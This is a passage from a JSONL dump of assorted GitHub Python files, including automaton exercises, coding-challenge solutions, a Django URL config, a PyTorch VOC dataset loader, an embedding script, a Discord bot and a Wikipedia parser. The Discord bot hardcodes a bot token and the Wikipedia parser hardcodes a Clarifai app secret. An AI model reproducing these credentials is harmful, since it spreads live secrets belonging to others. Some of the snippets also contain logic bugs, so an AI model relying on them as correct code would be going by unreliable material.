s in a2.transitions:\n if s[0] == a2.initial.name:\n a1star_a2_or_a3.add_transition(nom_nouvel_etat, s[1], str(int(s[2])+ 1 + int(nom_nouvel_etat)))\n else:\n a1star_a2_or_a3.add_transition(str(int(s[0])+ 1 + int(nom_nouvel_etat)),s[1], str(int(s[2])+ 1 + int(nom_nouvel_etat) ))\n nom_nouvel_etat2 = nouvel_etat(a1star_a2_or_a3)\n a1star_a2_or_a3.add_transition(nom_nouvel_etat2,EPSILON,a1star_a2_or_a3.initial.name)\n a1star_a2_or_a3.add_transition(nom_nouvel_etat2,EPSILON,nom_nouvel_etat)\n a1star_a2_or_a3.initial=a1star_a2_or_a3.statesdict[nom_nouvel_etat2]\n \n for s in a2.states :\n if s in a2.acceptstates :\n a1star_a2_or_a3.make_accept(str(int(s)+ int(nom_nouvel_etat)))\n \n\n return a1star_a2_or_a3\n \n##################\n \ndef regexp_to_automaton(re:str)->Automaton:\n \"\"\"\n Moore's algorithm: regular expression `re` -> non-deterministic automaton\n \"\"\"\n postfix = RegExpReader(regexp).to_postfix()\n stack:List[Automaton] = []\n \n for p in postfix:\n if p!= \"*\" and p != \"+\" and p!= \".\" :\n a = Automaton(p)\n a.add_transition(\"0\", p ,\"1\")\n a.make_accept(\"1\")\n stack.append(a)\n \n elif p == \"+\":\n a1 = stack.pop();\n a2 = stack.pop();\n stack.append(union(a2, a1))\n \n \n elif p ==\"*\":\n a = stack.pop();\n stack.append(kleene(a))\n \n elif p == \".\":\n a1 = stack.pop();\n a2 = stack.pop();\n stack.append(concat(a2, a1))\n \n return stack[0]\n \n##################\n\nif __name__ == \"__main__\" :\n\n if len(sys.argv) != 3:\n usagestring = \"Usage: {} \"\n error(usagestring.format(sys.argv[0]))\n\n regexp = sys.argv[1] \n word = sys.argv[2]\n\n a = regexp_to_automaton(regexp)\n determinise(a)\n if recognizes(a, word):\n print(\"YES\")\n else:\n print(\"NO\")\n\n","repo_name":"Tecna3000/Licence2-Informatique","sub_path":"S3/Automate finis/automatefinistp1/tp4automates.py","file_name":"tp4automates.py","file_ext":"py","file_size_in_byte":6238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28289754276","text":"\"\"\"\nQuestions Marks\n\nHave the function QuestionsMarks(str) take the str string parameter, which will\ncontain single digit numbers, letters, and question marks, and check if there\nare exactly 3 question marks between every pair of two numbers that add up to 10.\n\nIf so, then your program should return the string true, otherwise it should\nreturn the string false. If there aren't any two numbers that add up to 10 in\nthe string, then your program should return false as well.\n\nFor example: if str is \"arrb6???4xxbl5???eee5\" then your program should return\n'true' because there are exactly 3 question marks between 6 and 4, and 3\nquestion marks between 5 and 5 at the end of the string.\n\nExamples\n\nInput: \"aa6?9\"\nOutput: false\n\nInput: \"acc?7??sss?3rr1??????5\"\nOutput: true\n\"\"\"\nimport re\ndef QuestionsMarks(strParam):\n n = 0\n count = 0\n flag = 'false'\n for i in strParam:\n if i in '0123456789':\n n += int(i)\n if count == 3 and n == 10:\n flag = 'true'\n count = 0\n elif i == '?':\n count += 1\n \n return flag\n\nif __name__ == '__main__':\n input = \"aa6?9\"\n print(QuestionsMarks(input))\n # Output: false\n\n input = \"acc?7??sss?3rr1??????5\"\n print(QuestionsMarks(input))\n # Output: true\n","repo_name":"vivamoto/challenges","sub_path":"questions_marks/question_marks.py","file_name":"question_marks.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28612226016","text":"import bisect\r\nimport time\r\n\r\ndef solution(info, query):\r\n t = time.time()\r\n ans = []\r\n\r\n infos = {}\r\n\r\n tmp = []\r\n for item in info:\r\n item = item.split()\r\n k, score = tuple(item[:4]), int(item[-1])\r\n tmp.append((k, score))\r\n\r\n tmp.sort(key=lambda x: x[1])\r\n\r\n for item in tmp:\r\n k, score = item\r\n if k not in infos:\r\n infos[k] = []\r\n infos[k].append(score)\r\n\r\n for q in query:\r\n q = q.split()\r\n q = list(filter(lambda x: x != 'and', q))\r\n q_score = int(q[-1])\r\n q = q[:-1]\r\n\r\n q_k = list(infos.keys())\r\n\r\n for current_q in q:\r\n if current_q == '-':\r\n continue\r\n q_k = list(filter(lambda x: current_q in x, q_k))\r\n\r\n q_infos = [infos[x] for x in q_k]\r\n q_result = 0\r\n\r\n for scores in q_infos:\r\n # idx = bisect.bisect_left(scores, q_score)\r\n # count = len(scores) - idx\r\n # q_result += count\r\n s = 0\r\n e = len(scores) - 1\r\n m = (e + s) // 2\r\n while True:\r\n if q_score <= scores[m]:\r\n e = m\r\n else:\r\n s = m + 1\r\n if m == ((e + s) // 2):\r\n q_result += len(scores[s:])\r\n break\r\n m = (e + s) // 2\r\n\r\n ans.append(q_result)\r\n\r\n return ans\r\n\r\ninfo = [\"java backend junior pizza 150\", \"python frontend senior chicken 210\",\"python frontend senior chicken 150\",\"cpp backend senior pizza 260\",\"java backend junior chicken 80\",\"python backend senior chicken 50\"]\r\nquery = [\"java and backend and junior and pizza 100\",\"python and frontend and senior and chicken 200\",\"cpp and - and senior and pizza 250\",\"- and backend and senior and - 150\",\"- and - and - and chicken 100\",\"- and - and - and - 150\"]\r\ns = time.time()\r\nprint(solution(info, query))\r\nprint('t-time: ', time.time() - s)","repo_name":"wonnerky/coteMaster","sub_path":"kakao/2021/3-sol2.py","file_name":"3-sol2.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73434018978","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.urls import include, path, re_path\nfrom django.views.static import serve\nfrom django.conf import settings\n\nfrom drf_spectacular.views import (SpectacularAPIView, SpectacularRedocView, SpectacularSwaggerView)\n\nfrom . import views\n\n\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.index, name='index'),\n\n #authentication app\n path('role/', include('authentication.urls.role_urls')),\n path('permission/', include('authentication.urls.permission_urls')),\n path('user/', include('authentication.urls.user_urls')),\n path('employee/', include('authentication.urls.employee_urls')),\n\n #device app\n path('category/', include('device.urls.category_urls')),\n path('device/', include('device.urls.device_urls')),\n path('device_assign/', include('device.urls.device_assign_urls')),\n path('device_return/', include('device.urls.device_return_urls')),\n path('device_log/', include('device.urls.device_log_urls')),\n\n\n #swagger urls\n path('schema/', SpectacularAPIView.as_view(), name='schema'),\n path('schema/swagger-ui/', SpectacularSwaggerView.as_view(url_name='schema'), name='swagger-ui'),\n path('schema/redoc/', SpectacularRedocView.as_view(url_name='schema'), name='redoc'),\n\n\tre_path(r'^media/(?P.*)$', serve, {'document_root': settings.MEDIA_ROOT}), \n re_path(r'^static/(?P.*)$', serve, {'document_root': settings.STATIC_ROOT}),\n\n]\n","repo_name":"babor99/repliq_django_assessment","sub_path":"start_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73276511778","text":"# Add the root path of the dmrgpy library\nimport os ; import sys ; sys.path.append(os.getcwd()+'/../../src')\n\nimport numpy as np\nfrom dmrgpy import fermionchain\nns = 10 # number of spinful fermionic sites\nfc = fermionchain.Spinful_Fermionic_Chain(ns) # create the chain\nh = 0 # initialize Hamiltonian\n\nmu = -1.0 # chemical potential\n\n# first add the hoppings\nfor i in range(ns-1): # loop over sites\n h = h + fc.Cdagup[i]*fc.Cup[i+1]\n h = h + fc.Cdagdn[i]*fc.Cdn[i+1]\nh = h + h.get_dagger() # complex conjugate\n\n\n# now add the chemical potential\nfor i in range(ns): # loop over sites\n h = h + mu*fc.Cdagup[i]*fc.Cup[i]\n h = h + mu*fc.Cdagdn[i]*fc.Cdn[i]\n\n# setup the Hamiltonian\nfc.set_hamiltonian(h) # initialize Hamiltonian\n\ni = 0\ninds = range(ns)\nvevup = [fc.vev(fc.Cdagup[i]*fc.Cup[j]) for j in inds]\nvevdn = [fc.vev(fc.Cdagdn[i]*fc.Cdn[j]) for j in inds]\n\n\n# these lines would be for charge-charge correlator\n#vevup = [fc.vev(fc.Nup[i]*fc.Nup[j]) - fc.vev(fc.Nup[i])*fc.vev(fc.Nup[j]) for j in inds]\n#vevdn = [fc.vev(fc.Ndn[i]*fc.Ndn[j]) - fc.vev(fc.Ndn[i])*fc.vev(fc.Ndn[j]) for j in inds]\n\n\n\n\nvevs = np.array(vevup) + np.array(vevdn) # up + down\n\n\n\nimport matplotlib.pyplot as plt\nplt.plot(inds,vevs,marker=\"o\")\nplt.xlabel(\"Site j\")\nplt.ylabel(\"$\\\\langle C^\\\\dagger_i C_j \\\\rangle$\")\nplt.show()\n\n","repo_name":"joselado/dmrgpy","sub_path":"examples/fermionic_static_correlator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"34"} +{"seq_id":"12810824510","text":"from numpy import sum,random\nimport pandas as pd\nimport numpy as np\nimport math \nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n#ucitava sve podatke iz fajla\npodaci=pd.read_csv(\"test.csv\" )\n\n#na prazna mjesta u koloni absences postavlja nule\npodaci['absences'][podaci['absences'].eq(' ')]='0'\npodaci['absences']= pd.to_numeric(podaci['absences'])\n\n#srednja vrijednost za broj izostanaka studenata\nE = sum(podaci['absences'])/len(podaci)\nprint(E)\nvar= sum((podaci['absences']-E)**2)/(len(podaci)-1)\nprint(var)\n\n#standardna devijacija \nsd=math.sqrt(var)\nprint(sd)\n\n#izbacuje iz analize podatke koji se nalaze izvan intervala sd\npodaci1=podaci.drop(podaci[podaci.absences>(E+sd)].index)\n\n#srednja vrijednost za broj izostanaka studenata koji su slusali predmet\nE1= sum(podaci1['absences'])/len(podaci)\nvar1= sum((podaci1['absences']-E1)**2)/(len(podaci)-1)\nsd1=math.sqrt(var1)\npodaci2=pd.read_csv(\"test.csv\")\n\n#na prazna mjesta ubacuje vrijednost koja se najcesce ponavlja\npodaci2['absences'][podaci2['absences'].eq(' ')]=int(E1)\npodaci2['absences']= pd.to_numeric(podaci2['absences'])\npodaci3=podaci2.drop(podaci2[podaci2.absences>(E+sd)].index)\nn=len(podaci3)\n\n#pravljenje novih kolona kako bi izracunali vjerovatnocu da student\n#dobije deset ako je izostao sa 10 ili vise sati predavanja\npodaci3[\"Ocjena_10\"]= np.where(podaci3['G3']>=16,1,0)\npodaci3[\"Puno_izostanaka\"]= np.where(podaci3['absences']>=10,1,0)\npodaci3[\"Brojac\"]=1\npodaci4=podaci3[[\"Ocjena_10\", \"Puno_izostanaka\", \"Brojac\"]]\ntabela=pd.pivot_table(\n podaci4,\n index=[\"Ocjena_10\"],\n columns=[\"Puno_izostanaka\"],\n values=\"Brojac\",\n aggfunc=np.size \n )\nP_A=(35+3)/(276+35+32+3)\nprint(P_A)\nP_B=(32+3)/(276+35+32+3)\nprint(P_B)\nP_AB=3/(276+35+32+3)\nprint(P_AB)\nP_A_B=P_AB/P_B\nprint(P_A_B)\nE2= sum(podaci3['absences'])/n\nvar2= sum((podaci3['absences']-E2)**2)/(n-1)\nsd2=math.sqrt(var2)\n\n\n#histogram\nn1=100000\nX=random.normal(E2,var2, size=n1)\nsns.distplot(X, hist=True, kde=False)\nplt.grid()\nplt.title(\" Normalna raspodjela\")\nplt.xlabel(\"x\")\nplt.ylabel(\"fx(x)\")\nplt.show()\nk=podaci3[\"Ocjena_10\"]\nplt.hist(k)\nplt.xlabel(\"1 - studenti koji su dobili ocjenu 10\")\nplt.ylabel(\"Broj studenata\")\nplt.grid()\n\nplt.figure(2)\nk1=P_A_B\nplt.hist(k1)\nplt.title(\"Vjerovatnoća da je student dobio ocjenu 10 na predmetu ako je izostao sa 10 ili više sati predavanja\")\nplt.grid()\n\n","repo_name":"azrazic/Statistical-theory-","sub_path":"kod.py","file_name":"kod.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9130457973","text":"\"\"\"\nEmbed each row of a `.jsonl` file using a HuggingFace model and save the embeddings.\n\nAuthors: The Meerkat Team (Karan Goel, Sabri Eyuboglu, Arjun Desai)\nLicense: Apache License 2.0\n\"\"\"\nimport os\nfrom argparse import ArgumentParser\n\nimport numpy as np\nimport pyarrow as pa\nimport pyarrow.compute as pc\nimport pyarrow.json\nimport torch\nimport torch.nn.functional as F\nfrom rich import print\nfrom tqdm.auto import tqdm\nfrom transformers import AutoModel, AutoTokenizer\n\nimport meerkat as mk\n\n\nclass TruncatedDataset:\n def __init__(\n self,\n df: mk.DataFrame,\n tokenizer: AutoTokenizer,\n chunk_size: int,\n ):\n self.df = df\n self.tokenizer = tokenizer\n self.chunk_size = chunk_size\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, idx):\n data = self.df[idx]\n tokenized = self.tokenizer(\n data[\"text\"],\n pad_to_multiple_of=self.chunk_size,\n padding=True,\n )\n return {\n \"input_ids\": torch.tensor(tokenized[\"input_ids\"][: self.chunk_size]),\n \"attention_mask\": torch.tensor(\n tokenized[\"attention_mask\"][: self.chunk_size]\n ),\n \"doc_id\": data[\"id\"],\n \"chunk_id\": 0,\n }\n\n\ndef create_model_and_tokenizer(\n model_name: str,\n cache_dir: str,\n):\n print(\"Loading tokenizer...\")\n tokenizer = AutoTokenizer.from_pretrained(model_name, cache_dir=cache_dir)\n tokenizer.add_special_tokens({\"pad_token\": \"[PAD]\"})\n print(\"Loading model...\")\n model = AutoModel.from_pretrained(model_name, cache_dir=cache_dir).cuda()\n\n return model, tokenizer\n\n\ndef prepare(feature_dir: str, savepath: str):\n if not os.path.exists(feature_dir):\n os.makedirs(feature_dir)\n\n if os.path.exists(savepath):\n exit()\n\n\ndef load_dataframe(path):\n print(\"Loading dataframe...\")\n # Load in the JSON.\n df = mk.from_json(\n path,\n lines=True,\n backend=\"arrow\",\n read_options=pa.json.ReadOptions(**{\"block_size\": 10 << 20}),\n )\n\n if \"meta\" in df.columns:\n struct_array = df[\"meta\"].data\n result = {}\n for field_index in range(struct_array.type.num_fields):\n field = struct_array.type.field(field_index)\n result[field.name] = mk.ArrowScalarColumn(\n pc.struct_field(struct_array, field.name)\n )\n meta_df = mk.DataFrame(result)\n else:\n meta_df = mk.DataFrame()\n\n if \"id\" in meta_df.columns:\n df[\"id\"] = meta_df[\"id\"]\n elif \"arxiv_id\" in meta_df.columns:\n df[\"id\"] = meta_df[\"arxiv_id\"]\n else:\n try:\n df[\"id\"] = meta_df[\"pkey\"]\n except:\n df.create_primary_key(\"id\")\n df = df.set_primary_key(\"id\")\n\n try:\n df = df.drop(\"pkey\")\n except ValueError:\n pass\n\n assert set(df.columns) >= set(\n [\"id\", \"text\"]\n ), f\"Unexpected columns: {set(df.columns)}\"\n return df\n\n\ndef create_dataloader(\n filepath: str,\n tokenizer: AutoTokenizer,\n chunk_size: int,\n batch_size: int,\n num_workers: int,\n):\n dataset = TruncatedDataset(\n load_dataframe(filepath),\n tokenizer,\n chunk_size=chunk_size,\n )\n return torch.utils.data.DataLoader(\n dataset,\n shuffle=False,\n batch_size=batch_size,\n num_workers=num_workers,\n )\n\n\n@torch.no_grad()\ndef extract_features(\n model: torch.nn.Module,\n input_ids: torch.Tensor,\n attention_mask: torch.Tensor,\n):\n \"\"\"Extract features from the model.\"\"\"\n # Extract features from the model\n attention_mask = attention_mask.cuda()\n outputs = model.forward(input_ids.cuda(), attention_mask=attention_mask)[0]\n\n # Use the attention mask to average the output vectors.\n outputs = outputs.cpu()\n attention_mask = attention_mask.cpu()\n features = (outputs * attention_mask.unsqueeze(2)).sum(1) / attention_mask.sum(\n 1\n ).unsqueeze(1).cpu()\n\n # Normalize embeddings\n features = F.normalize(features, p=2, dim=1).numpy()\n\n return features\n\n\ndef run_feature_extraction(\n model: torch.nn.Module,\n dataloader: torch.utils.data.DataLoader,\n):\n print(\"Feature extraction...\")\n storage = []\n for batch in tqdm(dataloader):\n features = extract_features(model, batch[\"input_ids\"], batch[\"attention_mask\"])\n storage.append(features)\n\n # Save the features to disk.\n return np.concatenate(storage, axis=0).reshape(-1, 384)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"--gpu\", type=int, default=0)\n parser.add_argument(\"--filepath\", type=str)\n parser.add_argument(\"--num_workers\", type=int, default=16)\n parser.add_argument(\"--batch_size\", type=int, default=8)\n parser.add_argument(\"--chunk_size\", type=int, default=256)\n parser.add_argument(\n \"--model_name\",\n type=str,\n default=\"sentence-transformers/all-MiniLM-L6-v2\",\n )\n parser.add_argument(\"--cache_dir\", type=str, default=\"/home/karan/models/\")\n parser.add_argument(\n \"--feature_dir\",\n type=str,\n default=f\"/home/karan/data/pyjama/features/\",\n )\n\n args = parser.parse_args()\n feature_dir = os.path.join(args.feature_dir, args.model_name)\n\n CUDA_VISIBLE_DEVICES = args.gpu\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(CUDA_VISIBLE_DEVICES)\n\n # Get num_gpus on this machine.\n num_gpus = torch.cuda.device_count()\n\n filepath = args.filepath\n filename = os.path.basename(filepath)\n savepath = os.path.join(feature_dir, filename.replace(\".jsonl\", \".npy\"))\n prepare(feature_dir, savepath)\n\n model, tokenizer = create_model_and_tokenizer(args.model_name, args.cache_dir)\n dataloader = create_dataloader(\n filepath,\n tokenizer,\n chunk_size=args.chunk_size,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n )\n\n features = run_feature_extraction(model, dataloader)\n np.save(savepath, features)\n print(\"Done.\")\n","repo_name":"togethercomputer/RedPajama-Data","sub_path":"viz/embed_jsonl.py","file_name":"embed_jsonl.py","file_ext":"py","file_size_in_byte":6047,"program_lang":"python","lang":"en","doc_type":"code","stars":3920,"dataset":"github-code","pt":"34"} +{"seq_id":"8359928865","text":"\nimport torch\nimport numpy as np\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\nfrom PIL import Image, ImageFile\nimport segmentation.utils.custom_transforms as tr\n\nVOC_COLORMAP = [[0, 0, 0], [128, 0, 0], [0, 128, 0], [128, 128, 0],\n [0, 0, 128], [128, 0, 128], [0, 128, 128], [128, 128, 128],\n [64, 0, 0], [192, 0, 0], [64, 128, 0], [192, 128, 0],\n [64, 0, 128], [192, 0, 128], [64, 128, 128], [192, 128, 128],\n [0, 64, 0], [128, 64, 0], [0, 192, 0], [128, 192, 0],\n [0, 64, 128]]\n\nVOC_CLASSES = ['background', 'aeroplane', 'bicycle', 'bird', 'boat',\n 'bottle', 'bus', 'car', 'cat', 'chair', 'cow',\n 'diningtable', 'dog', 'horse', 'motorbike', 'person',\n 'potted plant', 'sheep', 'sofa', 'train', 'tv/monitor']\n\nclass VOCSegmentation(Dataset):\n def __init__(self, dataset_root, args, split):\n \"\"\"\n crop_size: (h, w)\n \"\"\"\n self.split = split\n self.dataset_root = dataset_root\n self.args = args \n self.id_file = '%s/ImageSets/Segmentation/%s' % (dataset_root, 'trainval.txt' if self.split=='train' else 'test.txt')\n with open(self.id_file, 'r') as f:\n self.img_ids = f.read().split() # 拆分成一个个名字组成list\n self.colormap2label = np.zeros(256**3, dtype=np.uint8) # torch.Size([16777216])\n for i, colormap in enumerate(VOC_COLORMAP):\n # 每个通道的进制是256,这样可以保证每个 rgb 对应一个下标 i\n self.colormap2label[(colormap[0] * 256 + colormap[1]) * 256 + colormap[2]] = i\n\n def filter(self, imgs):\n return [img for img in imgs if (\n img.size[1] >= self.crop_size[0] and img.size[0] >= self.crop_size[1])]\n\n def __getitem__(self, idx):\n self.img_id = self.img_ids[idx]\n _image, mask_image = self._read_voc_images()\n _target = self._voc_label_indices(mask_image)\n _target = Image.fromarray(_target)\n sample = {'image': _image, 'label': _target}\n if self.split == \"train\":\n return self._transform_train(sample)\n elif self.split == 'val':\n return self._transform_val(sample)\n \n def __len__(self):\n return len(self.img_ids)\n\n\n def _read_voc_images(self):\n image= Image.open('%s/JPEGImages/%s.jpg' % (self.dataset_root, self.img_id)).convert(\"RGB\")\n mask_image = Image.open('%s/SegmentationClass/%s.png' % (self.dataset_root, self.img_id)).convert(\"RGB\")\n return image, mask_image # PIL image 0-255\n def _voc_label_indices(self, mask_colormap ):\n mask_colormap = np.array(mask_colormap.convert(\"RGB\")).astype('int32')\n idx = ((mask_colormap[:, :, 0] * 256 + mask_colormap[:, :, 1]) * 256 + mask_colormap[:, :, 2]) \n return self.colormap2label[idx] # colormap 映射 到colormaplabel中计算的下标\n\n\n def _transform_train(self, sample):\n composed_transforms = transforms.Compose([\n tr.RandomHorizontalFlip(),\n tr.RandomScaleCrop(base_size=self.args.data.BASE_SIZE, crop_size=self.args.data.CROP_SIZE),\n tr.RandomGaussianBlur(),\n tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n tr.ToTensor()])\n\n return composed_transforms(sample)\n\n def _transform_val(self, sample):\n ori_size = sample['image'].size\n composed_transforms = transforms.Compose([\n \n tr.FixScaleCrop(crop_size = self.args.data.CROP_SIZE),\n tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n tr.ToTensor()])\n\n return composed_transforms(sample), ori_size","repo_name":"yannqi/CV-Dataset-Dataloader-Pytorch","sub_path":"segmentation/VOC/voc.py","file_name":"voc.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"72044892259","text":"'''ZADANIE 2'''\r\n# W sklepie ze sprzętem AGD oferowana jest sprzedaż ratalna. Napisz program\r\n# umożliwiający wyliczenie wysokości miesięcznej raty za zakupiony sprzęt. Danymi\r\n# wejściowymi dla programu są:\r\n# cena towaru (od 100 zł do 10 tyś. zł),\r\n# liczba rat (od 6 do 48).\r\n# Kredyt jest oprocentowany w zależności od liczby rat:\r\n# od 6–12 wynosi 2.5% ,\r\n# od 13–24 wynosi 5%,\r\n# od 25–48 wynosi 10%.\r\n# Obliczona miesięczna rata powinna zawierać również odsetki. Program powinien\r\n# sprawdzać, czy podane dane mieszczą się w określonych powyżej zakresach, a w\r\n# przypadku błędu pytać prosić użytkownika ponownie o podanie danych.\r\n\r\n'''ROZWIĄZANIE'''\r\n# Function\r\n# Przyjmuje dane od użytkownika\r\n# Zabezpiecza przed podaniem wartosci spoza okreslonych przedziałów\r\ndef load_data(from_min, to_max, name):\r\n data = int(input(f\"{name} - podaj wartość: \"))\r\n while not from_min <= data <= to_max:\r\n data = int(input(f\"{name} - nieprawidłowy przedział. Podaj ponownie: \"))\r\n return data\r\n\r\n#Input\r\ncena_towaru = load_data(100, 10000, \"Cena towaru\")\r\nliczba_rat = load_data(6, 48, \"Liczba rat\")\r\n\r\nif 6 <= liczba_rat <= 12:\r\n oprocentowanie = 0.025\r\nelif liczba_rat <= 24:\r\n oprocentowanie = 0.05\r\nelse:\r\n oprocentowanie = 0.1\r\n\r\n#Output\r\nmies_rata = (cena_towaru + (cena_towaru * oprocentowanie)) / liczba_rat\r\noprocentowanie *= 100\r\n\r\nprint(f\"\\nPARAMETRY \\n- Cena towaru: {cena_towaru:.2f} PLN\\n- Liczba rat: {liczba_rat} \\n- Oprocentowanie: {oprocentowanie}% \\n- Miesięczna rata: {mies_rata:.2f} PLN\")\r\n","repo_name":"jarsonX/Learning_Python","sub_path":"_exercises/beginners/in-polish/Zadanie-000002.py","file_name":"Zadanie-000002.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"38375995272","text":"from sys import stdin\n\nn = int(stdin.readline())\n\nfor _ in range(n):\n vstring = list(stdin.readline())\n stack = []\n for v in vstring:\n if v == '(':\n stack.append(v)\n elif v == ')':\n if len(stack) != 0:\n stack.pop()\n else:\n stack.append('x')\n break\n\n if len(stack) != 0:\n print('NO')\n else:\n print('YES')\n","repo_name":"bong7233/BOJ","sub_path":"백준/Silver/9012. 괄호/괄호.py","file_name":"괄호.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30653266200","text":"import json\nimport copy\n\nDEFAULT_SECURITY_HEADERS = {\n 'Strict-Transport-Security' : 'max-age=31540000',\n 'X-Frame-Options': 'DENY',\n 'X-XSS-Protection': '1; mode=block',\n 'X-Content-Type-Options': 'nosniff',\n 'Access-Control-Allow-Headers': 'Content-Type,Authorization,X-Amz-Date,X-Api-Key,X-Amz-Security-Token',\n 'Access-Control-Allow-Methods': 'DELETE,GET,HEAD,OPTIONS,PATCH,POST,PUT',\n 'Access-Control-Allow-Origin': '*',\n}\n\n\ndef create_response_obj(status_code, body):\n headers = copy.deepcopy(DEFAULT_SECURITY_HEADERS)\n headers['Content-Type'] = 'application/json'\n\n return {\n 'statusCode': status_code,\n 'body': json.dumps(body, default=str),\n 'headers': headers\n }\n","repo_name":"aws-samples/deep-learning-web-app","sub_path":"backend/training-pipeline/functions/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"5206261637","text":"\"\"\"\n\n\"\"\"\n\n\ndef chef_and_game(data):\n for i in range(0, len(data)):\n for j in range(0, len(data)):\n if data[i] > data[j]:\n data[i] = data[i] - data[j]\n\n return data[0]\n\n\nif __name__ == '__main__':\n t = int(input())\n for i in range(0, t):\n size = input()\n arr = [int(i) for i in input().split()][0:int(size)]\n print(chef_and_game(arr))","repo_name":"Harish-Muralidhar/Benchmark_Test_To_Analyze_Performance_Of_Code_Generating_Foundation_Models","sub_path":"generated_codes/experiment_c/parameter_set_1/five_samples/python_files/115_3.py","file_name":"115_3.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33152553275","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 1 16:01:07 2019\n\n@author: Administrator\n\"\"\"\n\nimport tensorflow as tf\nglobal_step=tf.Variable(0,trainable=False)\ninitial_lr=0.1\nlr=tf.train.exponential_decay(initial_lr,global_step=global_step,decay_steps=10,decay_rate=0.9)\nopt=tf.train.GradientDescentOptimizer(lr)\nadd_global=global_step.assign_add(1) #定义一个op,使global_step加1完成计步\nwith tf.Session() as sess:\n tf.global_variables_initializer().run()\n print(sess.run(lr))\n for i in range(20):\n g,rate=sess.run([add_global,lr])\n print(g,rate)","repo_name":"librauee/DeepLearning","sub_path":"tensorflow_learning/lr_decay.py","file_name":"lr_decay.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"34"} +{"seq_id":"24386168894","text":"import discord\nfrom discord.ext import commands\nimport asyncio\n\nTOKEN = 'NTc5MDA0Njg3NjQzMzEyMTQ4.XN72Jw.6m1nn6vTn78m8ugd4SEOpa_eUaM'\n\n# The character used to call commands\nclient = commands.Bot(command_prefix='!')\nclient.remove_command('help')\n\n'''Names of the cogs.\nMake sure to add your cog to this list for it to work properly'''\nextensions = ['basic', 'faq', 'roadmap', 'help', 'admin', 'challenges']\nextensions = ['cogs.' + name for name in extensions]\n\nif __name__ == '__main__':\n try:\n for extension in extensions:\n client.load_extension(extension)\n print(f'Loaded {extension}')\n except Exception as e:\n print(f'{extension} cannot be loaded: {e}')\n\n\n@client.event\nasync def on_ready():\n print(\n str(client.user.name)\n + \" is online\\nVersion: \"\n + discord.__version__\n )\n print(\"------\")\n\n\nclient.run(TOKEN)\n","repo_name":"smallest-cock/python3-practice-projects","sub_path":"Discord bot/worldofpythonbot/Bot/World_of_Python_Bot_Core.py","file_name":"World_of_Python_Bot_Core.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"72886757219","text":"from ClarifaiParse import ClarifaiParse\nimport json\nimport wikipedia\nfrom bs4 import BeautifulSoup\nimport httplib2\n\nclass WikiParse:\n def __init__(self):\n app_id = \"aoaEzeM8d6fiL2L1eX--OtjXFAaPe_CDo6zFvEJD\"\n app_secret = \"fjhnJKSdHcZJACroOvCCoNf4tgi9YlOQpi52z-Pb\"\n self.c = ClarifaiParse(app_id, app_secret)\n self.rank = [\"domain\", \"kingdom\", \"phylum\", \n \"class\", \"subclass\", \"superorder\",\n \"order\", \"suborder\", \"family\",\n \"subfamily\", \"genus\", \"species\"]\n \n def linnean_values(self, table):\n t = str(table).lower()\n for i in range(len(self.rank)-1, -1, -1):\n if self.rank[i] in t:\n print(self.rank[i])\n return i\n\n return -1\n\n def linnean_table(self, url, http):\n status, response = http.request(url)\n soup = BeautifulSoup(response, \"lxml\")\n table = soup.find(\"table\", {\"class\":\"infobox biota\"})\n return table\n\n def get_matches(self, name, max_count=3):\n matches = []\n http = httplib2.Http()\n\n i = 0\n for result in self.c.parse(name):\n if i >= max_count: break\n name = result[\"tag\"]\n \n try:\n wiki_response = wikipedia.WikipediaPage(name)\n table = self.linnean_table(wiki_response.url, http)\n if table != None: \n linnean = self.linnean_values(table)\n result[\"linnean\"] = linnean\n result[\"summary\"] = wiki_response.summary\n \n print(name, linnean, \"is a real and relevant article\")\n matches.append(result)\n i += 1\n \n except wikipedia.exceptions.DisambiguationError as e:\n continue\n except wikipedia.exceptions.PageError as e:\n print(name, \"is not a real article\")\n continue\n \n matches = sorted(matches, key=lambda k: -k[\"linnean\"])\n return json.dumps(matches)\n\n\nif __name__ == \"__main__\":\n w = WikiParse()\n url = 